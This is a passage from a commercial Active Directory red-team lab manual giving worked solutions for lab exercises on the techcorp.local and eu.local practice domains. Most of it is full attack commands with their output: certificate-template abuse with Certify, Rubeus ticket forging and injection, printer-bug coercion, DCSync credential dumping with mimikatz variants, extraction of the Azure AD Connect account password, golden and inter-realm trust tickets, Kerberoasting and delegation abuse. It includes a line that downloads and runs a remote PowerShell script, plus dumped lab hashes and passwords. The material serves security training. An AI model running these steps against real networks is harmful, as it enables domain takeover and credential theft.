UserRealm : US.TECHCORP.LOCAL
[snip]

Now, from the above session that has the privileges of pawadmin, request a certificate for the Domain
Administrator – Administrator. Note that certify will still show the context as studentuserx but you can
ignore that.

C:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:Techcorp-

DC.techcorp.local\TECHCORP-DC-CA
/template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : US\studentuserx

[*] No subject name specified, using current context as subject.

[*] Template : ForAdminsofPrivilegedAccessWorkstations

[*] Subject : CN=studentuserx, CN=Users, DC=us, DC=techcorp,
DC=local
[*] AltName : Administrator

[*] Certificate Authority : Techcorp-DC.techcorp.local\TECHCORP-DC-CA

[*] CA Response : The certificate had been issued.

[*] Request ID : 28

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----

MIIEogIBAAKCAQEA…
[snip]
-----END CERTIFICATE-----
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 82

Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END
CERTIFICATE----- and save it to cert.pem.

We need to convert it to PFX to use it. Use openssl binary on the student VM to do that. I will use
SecretPass@123 as the export password.

C:\AD\Tools>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -

keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out
C:\AD\Tools\DA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
unable to write 'random state'

Finally, request a TGT for the DA using the certificate and inject in current session!

C:\AD\Tools>C:\AD\Tools\Rubeus.exe asktgt /user:Administrator

/certificate:C:\AD\Tools\DA.pfx /password:SecretPass@123 /nowrap /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=studentuserx, CN=Users,
DC=us, DC=techcorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for:
'us.techcorp.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

doI…
[snip]

Let's try to access the us-dc to confirm our privileges!

C:\AD\Tools>winrs -r:us-dc whoami

us\administrator

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 83

Similarly, we can get Enterprise Admin privileges!

Use the following command to request an EA certificate (same command as use previously):

C:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:Techcorp-

DC.techcorp.local\TECHCORP-DC-CA
/template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
[snip]

Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END
CERTIFICATE----- and save it to cert.pem. We need to convert it to PFX to use it. Use openssl
binary on the student VM to do that. I will use SecretPass@123 as the export password.

C:\AD\Tools>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -

keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out
C:\AD\Tools\EA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
unable to write 'random state'

Finally, request and inject the EA TGT in the current session. Note that here we specify the user to be
the Enterprise Admin techcorp.local\Administrator:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe asktgt /user:techcorp.local\Administrator

/dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx
/password:SecretPass@123 /nowrap /ptt

Let's access the forest root DC!

C:\AD\Tools>winrs -r:techcorp-dc whoami

techcorp\administrator

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 84

Hands-On 18:
Task
• Abuse the Unconstrained Delegation on us-web to get Enterprise Admin privileges on
techcorp.local.

Solution
Recall that we compromised us-web (which has Unconstrained Delegation enabled) in a previous Hands-
on and used the Printer bug to compromise us.techcrop.local.

We can use a similar method to compromise techcorp.local.

Start a new process as webmaster, who has admin privileges on us-web:

C:\Windows\system32> C:\AD\Tools\Rubeus.exe asktgt /domain:us.techcorp.local

/user:webmaster
/aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

Copy Rubeus.exe to us-web and start monitoring for any authentication from techcorp-dc. Run the
below command in process running as webmaster:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-

web\C$\Users\Public\Rubeus.exe /Y
[snip]

C:\Windows\system32>winrs -r:us-web cmd.exe

C:\Users\webmaster>C:\Users\Public\Rubeus.exe monitor /targetuser:TECHCORP-

DC$ /interval:5 /nowrap
C:\Users\Public\Rubeus.exe monitor /targetuser:TECHCORP-DC$ /interval:5
/nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring

[*] Target user : TECHCORP-DC$
[*] Monitoring every 5 seconds for new TGTs

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 85

Next, run MS-RPRN.exe on the student VM to abuse the printer bug. Note that this time we target
techcorp-dc:

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\techcorp-dc.techcorp.local \\us-

web.us.techcorp.local
Attempted printer notification and received an invalid handle. The coerced
authentication probably worked!

On the session where Rubeus is running, we can see:

[snip]
[*] 1/15/2021 7:54:22 AM UTC - Found new TGT:

User : [email protected]
StartTime : 1/14/2021 8:06:19 PM
EndTime : 1/15/2021 6:06:15 AM
RenewTill : 12/31/1969 4:00:00 PM
Flags : name_canonicalize, pre_authent, forwarded,
forwardable
Base64EncodedTicket :
[snip]

[*] Ticket cache size: 1

We can copy Base64EncodedTicket, remove unnecessary spaces and newline (if any) and use the ticket
with Rubes on the student VM:

C:\AD\Tools> C:\AD\Tools\Rubeus.exe ptt /ticket:TGTofTECHCORP-DC$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Import Ticket

[+] Ticket successfully imported!

We can now run DCSync attack against TECHCORP-DC using the injected ticket:

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 86

C:\AD\Tools>C:\AD\Tools\SharpKatz.exe --Command dcsync --User
techcorp\administrator --Domain techcorp.local --DomainController techcorp-
dc.techcorp.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] techcorp.local will be the domain
[!] techcorp-dc.techcorp.local will be the DC server
[!] techcorp\administrator will be the user account
[*]
[*] Object RDN : Administrator
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : Administrator
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/4/2019 3:01:32 AM
[*] Object Security ID : S-1-5-21-2781415573-3701854478-2406986946-500
[*] Object Relative ID : 500
[*]
[*] Credents:
[*] Hash NTLM : bc4cf9b751d196c4b6e1a2ba923ef33f
[*] ntlm- 0 : bc4cf9b751d196c4b6e1a2ba923ef33f
[*] lm - 0 : 6ac43f8c5f2e6ddab0f85e76d711eab8
[*]
[*] Supplemental Credents:
[*]
[*] * Primary:NTLM-Strong-NTOWF
[*] Random Value : f94f43f24957c86f1a2d359b7585b940
[*]
[*] * Primary:Kerberos-Newer-Keys
[*] Default Salt :TECHCORP.LOCALAdministrator
[*] Credents
[*] aes256_hmac 4096:
58db3c598315bf030d4f1f07021d364ba9350444e3f391e167938dd998836883
[*] aes128_hmac 4096: 1470b3ca6afc4146399c177ab08c5d29
[*] des_cbc_md5 4096: c198a4545e6d4c94
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 87

Hands-on 19:
Task
• Find out the machine where Azure AD Connect is installed.
• Compromise the machine and extract the password of AD Connect user in clear-text.
• Using the AD Connect user's password, extract secrets from us-dc and techcorp-dc.

Solution
We can find out the machine where Azure AD Connect is installed by looking at the Description of
special account whose name begins with MSOL_.

Using the Active Directory module after loading it from InvisiShell:

PS C:\AD\Tools> Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server

techcorp.local -Properties * | select SamAccountName,Description | fl

SamAccountName : MSOL_16fb75d0227d
Description : Account created by Microsoft Azure Active Directory Connect
with installation identifier 16fb75d0227d4957868d5c4ae0688943 running on
computer US-ADCONNECT configured to synchronize to tenant
techcorpus.onmicrosoft.com. This account must have directory replication
permissions in the local Active Directory and write permission on certain
attributes to enable Hybrid Deployment.

Recall that we already have administrative access to us-adconnect as helpdeskadmin. With that access,
we can extract credentials of MSOL_16fb75d0227d account in clear-text. We will use the adconnect.ps1
script for that.

Connect to us-adconnect as helpdeskadmin. Run the below command from an elevated shell on the
student VM to start a cmd.exe as helpdeskadmin:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:us.techcorp.local

/user:helpdeskadmin
/aes256:f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534
/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

In the new process, run the following commands to copy InvisiShell on us-adconnect machine and use it:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll

\\us-adconnect\C$\Users\helpdeskadmin\Downloads\InShellProf.dll /Y
Does \\us-adconnect\C$\Users\helpdeskadmin\Downloads\InShellProf.dll specify
a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\InviShell\InShellProf.dll
1 File(s) copied

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 88

C:\Windows\system32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\us-
adconnect\C$\Users\helpdeskadmin\Downloads\RunWithRegistryNonAdmin.bat /Y
Does \\us-
adconnect\C$\Users\helpdeskadmin\Downloads\RunWithRegistryNonAdmin.bat
specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
1 File(s) copied

C:\Windows\system32>winrs -r:us-adconnect cmd

C:\Users\helpdeskadmin>cd C:\Users\helpdeskadmin\Downloads
cd C:\Users\helpdeskadmin\Downloads

C:\Users\helpdeskadmin\Downloads> RunWithRegistryNonAdmin.bat
[snip]

Now we have a PowerShell session from InvisiShell ready on us-adconnect. Next, host adconnect.ps1 on
a local web server and run the below commands on us-helpdesk to extract credentials of MSOL_
account

PS C:\Users\helpdeskadmin\Downloads> iex (New-Object

Net.WebClient).DownloadString('http://192.168.100.x/adconnect.ps1')
PS C:\Users\helpdeskadmin\Downloads> ADconnect
ADconnect
AD Connect Sync Credential Extract POC (@_xpn_)

AD Connect Sync Credential Extract v2 (@_xpn_)

[ Updated to support new cryptokey storage method ]

[*] Querying ADSync localdb (mms_server_configuration)

[*] Querying ADSync localdb (mms_management_agent)
[*] Using xp_cmdshell to run some Powershell as the service user
[*] Credentials incoming...

Domain: techcorp.local
Username: MSOL_16fb75d0227d
Password: 70&n1{p!Mb7K.C)/USO.a{@m*%.+^230@KAc[+sr}iF>Xv{1!{=/}}3B.T8IW-
{)^Wj^zbyOc=Ahi]n=S7K$wAr;sOlb7IFh}!%J.o0}?zQ8]fp&.5w+!!IaRSD@qYf

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 89

Now, we can use this password to run DCSync attacks against the target domain (techcorp.local in
present case). Run the below command from an elevated shell on student VM:

C:\Windows\system32>runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd

Enter the password for techcorp.local\MSOL_16fb75d0227d:
Attempting to start powershell.exe as user "techcorp.local\MSOL_16fb75d0227d"
...

In the new process:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync
/user:techcorp\administrator /domain:techcorp.local" "exit"
[snip]

Note that the runas command need not be executed from an elevated shell, we did that as SafetyKatz
checks if it is running from a high integrity process even if the command – DCSync – does not need high
integrity process. We can execute the same attack without needing administrator privileges on the
student VM using the below commands:

C:\Users\studentuser23>runas /user:techcorp.local\MSOL_16fb75d0227d /netonly

cmd
Enter the password for techcorp.local\MSOL_16fb75d0227d:
Attempting to start cmd as user "techcorp.local\MSOL_16fb75d0227d" ...

In the new process, run the following commands for DCSync:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\Windows\system32> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"lsadump::dcsync
/user:techcorp\administrator /domain:techcorp.local"'

.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25

mimikatz(powershell) # lsadump::dcsync /user:techcorp\administrator

/domain:techcorp.local
[DC] 'techcorp.local' will be the domain
[DC] 'Techcorp-DC.techcorp.local' will be the DC server
[DC] 'techcorp\administrator' will be the user account

Object RDN : Administrator

** SAM ACCOUNT **

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 90

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/4/2019 2:01:32 AM
Object Security ID : S-1-5-21-2781415573-3701854478-2406986946-500
Object Relative ID : 500

Credentials:
Hash NTLM: bc4cf9b751d196c4b6e1a2ba923ef33f
ntlm- 0: bc4cf9b751d196c4b6e1a2ba923ef33f
ntlm- 1: c87a64622a487061ab81e51cc711a34b
lm - 0: 6ac43f8c5f2e6ddab0f85e76d711eab8

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : f94f43f24957c86f1a2d359b7585b940

* Primary:Kerberos-Newer-Keys *
Default Salt : TECHCORP.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) :
58db3c598315bf030d4f1f07021d364ba9350444e3f391e167938dd998836883
aes128_hmac (4096) : 1470b3ca6afc4146399c177ab08c5d29
des_cbc_md5 (4096) : c198a4545e6d4c94

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 91

Hands-On 20:
Task
• Using DA access to us.techcorp.local, escalate privileges to Enterprise Admin or DA to the parent
domain, techcorp.local using the domain trust key.

Solution
We need the trust key, which can be retrieved using the DA privileges.

Run the below command on the student VM from an elevated shell:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:administrator

/aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b335
/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

In the new process, run the following commands. Remember to host SafetyKatz on a local web server.
Note that we are looking for the [In] key for us.techcorp.local to techcrop.local trust:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\us-

C:\Users\Administrator> netsh interface portproxy add v4tov4 listenport=8080

listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\Administrator> C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe
[snip]

mimikatz # lsadump::trust /patch

[snip]
Current domain: US.TECHCORP.LOCAL (US / S-1-5-21-210670787-2521448726-
163245708)
Domain: TECHCORP.LOCAL (TECHCORP / S-1-5-21-2781415573-3701854478-2406986946)
[ In ] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
* 1/7/2021 6:05:50 AM - CLEAR - ad 68 50 7f 52 d5 e8 06 da 6e 82 76 6b
83 79 30 2a 56 7d 59 dc bc 90 00 35 8d 4b 85 e5 e1 05 2a b7 b2 ea 69 58 08 f3
8f bc 9d 85 3c bf 20 e8 db d9 90 ae 3a ac 26 de 59 ff bc 4d c6 01 a5 4a 01 73
fa 6d 0c 83 65 67 1e 05 06 8a 88 20 09 c3 74 49 3a a7 10 81 d2 bd 50 d7 38 3d
5c 3b 9d b1 6f f7 22 60 e5 16 d5 70 2a f4 d0 b2 72 75 6b 4b ef ac 87 dd 25 9d
17 d2 18 86 9f dd a6 98 60 c0 61 8d 81 38 6e c4 1c 87 9e ad 6e 27 53 cc 7c bb
d9 cf e8 97 dd 9a c6 df a1 24 de 86 b8 79 45 98 28 83 9a c7 3f 10 ee ef 1f ba
6a 02 16 50 95 92 30 be b6 40 6c 09 47 43 31 3e 70 72 3c 7b 36 f7 a4 b8 01 ed

da 40 1d a0 89 e1 fd 47 dc 9a ac 6c 28 04 bf 5a 21 48 ff 1c 7f 6f ab 90 5c 5b
4e f3 33 c9 75 92 f5 90 fd 2d e6 66 58 98 5a 50 5e ad 3f
* aes256_hmac
470bb30b339656448e529c5804ef374b05c12d5e4bc8223cdce5ce9f0748b0c8
* aes128_hmac e1f49a05e66a388ef460d32d42083574
* rc4_hmac_nt 9fb9e247a02e6fde1631efa7fedce6a2
[snip]

Let's create the inter-realm TGT using the trust key that we got above. Note that the trust key may be
different for your lab and may change over time even in the same lab instance.

Run the below command from an elevated shell on the student VM:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708
/sids:S-1-5-21-2781415573-3701854478-2406986946-519
/rc4:9fb9e247a02e6fde1631efa7fedce6a2 /user:Administrator /service:krbtgt
/target:techcorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

[snip]
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2781415573-3701854478-2406986946-519 ;
PGKAODOKey: 9fb9e247a02e6fde1631efa7fedce6a2 - rc4_hmac_nt
PGKAODO : krbtgt
Target : techcorp.local
Lifetime : 1/15/2021 2:03:50 AM ; 1/13/2031 2:03:50 AM ; 1/13/2031 2:03:50
AM
-> Ticket : C:\AD\Tools\trust_tkt.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

Now, use Rubeus to request a TGS for CIFS on the forest root domain controller using the TGT generated
above.

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgs
/ticket:C:\AD\Tools\trust_tkt.kirbi /service:CIFS/techcorp-dc.techcorp.local
/dc:techcorp-dc.techcorp.local /ptt
[snip]

Check if the ticket is granted:

C:\Windows\system32>klist

Current LogonId is 0:0x516bb5d

Cached Tickets: (1)

#0> Client: Administrator @ us.techcorp.local

Server: CIFS/techcorp-dc.techcorp.local @ TECHCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40250000 -> forwardable pre_authent ok_as_delegate
name_canonicalize
Start Time: 1/15/2021 2:23:12 (local)
End Time: 1/15/2021 12:23:12 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

Finally, let's access the filesystem on techcorp-dc. Run the below command from the command prompt
where TGS is injected:

C:\Windows\system32>dir \\techcorp-dc.techcorp.local\c$
Volume in drive \\techcorp-dc.techcorp.local\c$ has no label.
Volume Serial Number is 88AD-6C8B

Directory of \\techcorp-dc.techcorp.local\c$

07/10/2019 08:00 AM <DIR> ExchangeSetupLogs

12/07/2020 02:51 AM <DIR> PerfLogs
01/07/2021 10:03 PM <DIR> Program Files
07/17/2019 10:02 PM <DIR> Program Files (x86)
01/07/2021 11:50 PM <DIR> Transcripts
07/18/2019 08:48 AM <DIR> Users
01/07/2021 10:03 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 15,823,593,472 bytes free

Hands-On 21:
Task
• Using DA access to us.techcorp.local, escalate privileges to Enterprise Admin or DA to the parent
domain, techcorp.local using the krbtgt hash of us.techcorp.local.

Solution
We already have the krbtgt hash of us.techcorp.local. Let's create the inter-realm TGT with SID history
set to Enterprise Admins. Run the below command from an elevated shell on the student VM:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /sids:S-1-5-21-
2781415573-3701854478-2406986946-519 /ptt" "exit"

[snip]

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted

for current session

Check for the ticket:

C:\Windows\system32>klist

Current LogonId is 0:0x531ae90

Cached Tickets: (1)

#0> Client: Administrator @ us.techcorp.local

Server: krbtgt/us.techcorp.local @ us.techcorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/15/2021 2:47:44 (local)
End Time: 1/13/2031 2:47:44 (local)
Renew Time: 1/13/2031 2:47:44 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

Try accessing resources on the root DC:

C:\Windows\system32>dir \\techcorp-dc.techcorp.local\c$
Volume in drive \\techcorp-dc.techcorp.local\c$ has no label.
Volume Serial Number is 88AD-6C8B

Directory of \\techcorp-dc.techcorp.local\c$

07/10/2019 08:00 AM <DIR> ExchangeSetupLogs
12/07/2020 02:51 AM <DIR> PerfLogs
01/07/2021 10:03 PM <DIR> Program Files
07/17/2019 10:02 PM <DIR> Program Files (x86)
01/07/2021 11:50 PM <DIR> Transcripts
07/18/2019 08:48 AM <DIR> Users
01/07/2021 10:03 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 15,823,523,840 bytes free

C:\Windows\system32>winrs -r:techcorp-dc cmd

C:\Users\Administrator.US>hostname
hostname
Techcorp-DC

C:\Users\Administrator.US>whoami
whoami
us\administrator

C:\Users\Administrator.US>exit
exit

Hands-On 22:
Task
• Find a service account in the eu.local forest and Kerberoast its password.

Solution
Using the Active Directory module, enumerate any service account with SPN in all the trusts of
our current forest:
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -
Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -
Server $_.Name}

[snip]

DistinguishedName : CN=storagesvc,CN=Users,DC=eu,DC=local
Enabled : True
GivenName : storage
Name : storagesvc
ObjectClass : user
ObjectGUID : 041fedb0-a442-4cdf-af34-6559480a2d74
SamAccountName : storagesvc
ServicePrincipalName : {MSSQLSvc/eu-file.eu.local}
SID : S-1-5-21-3657428294-2017276338-1274645009-1106
Surname : svc
UserPrincipalName : storagesvc

Once we have identified the target account, let's request a TGS:

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc

/simple /domain:eu.local /outfile: C:\AD\Tools\euhashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.

[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User : storagesvc

[*] Target Domain : eu.local
[*] Searching path 'LDAP://eu.local/DC=eu,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\euhashes.txt

[*] Roasted hashes written to : C:\AD\Tools\euhashes.txt

Run klist to check if the ticket is present:

C:\AD\Tools>klist
#3> Client: studentuserx @ US.TECHCORP.LOCAL
Server: MSSQLSvc/eu-file.eu.local @ EU.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 1/15/2021 4:32:32 (local)
End Time: 1/15/2021 14:29:35 (local)
Renew Time: 0
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x200 -> DISABLE-TGT-DELEGATION
Kdc Called: EU-DC.eu.local

Now, we can brute-force the hashes using John the ripper.

C:\Users\studentuser23>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --
wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\euhashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Qwerty@123 (?)
1g 0:00:00:00 DONE (2021-01-15 04:52) 83.33g/s 64000p/s 64000c/s 64000C/s
password..9999
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Hands-on 23:
Task
• Enumerate users in the eu.local domain for whom Constrained Delegation is enabled.
• Abuse the Delegation to execute DCSync attack against eu.local.

Solution
To enumerate users with constrained delegation we can use the ActiveDirectory module:

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -
Properties msDS-AllowedToDelegateTo -Server eu.local

DistinguishedName : CN=storagesvc,CN=Users,DC=eu,DC=local
msDS-AllowedToDelegateTo : {time/EU-DC.eu.local/eu.local, time/EU-
DC.eu.local, time/EU-DC, time/EU-DC.eu.local/EU...}
Name : storagesvc
ObjectClass : user
ObjectGUID : 041fedb0-a442-4cdf-af34-6559480a2d74
[snip]

Now, to be able to abuse Constrained Delegation that storagesvc user has on eu-dc we need either
password or NTLM hash of it. We already cracked storagesvc's password in cleartext using Kerberos. Use
the below commands from the student VM:

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe hash /password:Qwerty@123

/user:storagesvc /domain:eu.local

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Calculate Password Hash(es)

[*] Input password : Qwerty@123

[*] Input username : storagesvc

[*] Input domain : eu.local
[*] Salt : EU.LOCALstoragesvc
[*] rc4_hmac : 5C76877A9C454CDED58807C20C20AEAC
[*] aes128_cts_hmac_sha1 : 4A5DDDB19CD631AEE9971FB40A8195B8
[*] aes256_cts_hmac_sha1 :
4A0D89D845868AE3DCAB270FE23BEDD442A62C4CAD7034E4C60BEDA3C0F65E04
[*] des_cbc_md5 : 7F7C6ED00258DC57

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe s4u /user:storagesvc

/rc4:5C76877A9C454CDED58807C20C20AEAC /impersonateuser:Administrator
/domain:eu.local /msdsspn:nmagent/eu-dc.eu.local /altservice:ldap /dc:eu-
dc.eu.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[snip]

[+] Ticket successfully imported!

Check the ticket:

C:\Users\studentuserx>klist

Current LogonId is 0:0x531af0e

Cached Tickets: (1)

#0> Client: Administrator @ EU.LOCAL

Server: ldap/eu-dc.eu.local @ EU.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40250000 -> forwardable pre_authent ok_as_delegate
name_canonicalize
Start Time: 1/15/2021 5:02:14 (local)
End Time: 1/15/2021 15:02:14 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

Note that we requested an alternate ticket for the LDAP service. Since we are impersonating the domain
administrator of eu.local by abusing constrained delegation, we should now be able to run the DCSync
attack against eu.local:
C:\Users\studentuserx>C:\AD\Tools\SharpKatz.exe --Command dcsync --User
eu\krbtgt --Domain eu.local --DomainController eu-dc.eu.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] eu.local will be the domain
[!] eu-dc.eu.local will be the DC server
[!] eu\krbtgt will be the user account
[*]
[*] Object RDN : krbtgt
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : krbtgt
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : ACCOUNTDISABLE, NORMAL_ACCOUNT
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/12/2019 11:00:04 PM
[*] Object Security ID : S-1-5-21-3657428294-2017276338-1274645009-502
[*] Object Relative ID : 502
[*]
[*] Credents:
